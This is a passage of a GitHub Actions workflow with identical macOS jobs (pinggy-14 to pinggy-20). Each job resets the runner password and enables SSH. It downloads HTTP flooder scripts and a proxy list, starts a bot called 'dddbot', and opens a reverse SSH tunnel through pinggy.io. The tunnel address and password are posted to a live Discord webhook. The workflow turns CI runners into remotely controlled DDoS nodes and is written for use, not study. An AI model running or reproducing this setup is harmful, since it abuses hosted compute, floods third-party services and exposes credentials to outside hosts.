          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-14:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-15:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-16:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-17:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-18:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-19:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-20:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000
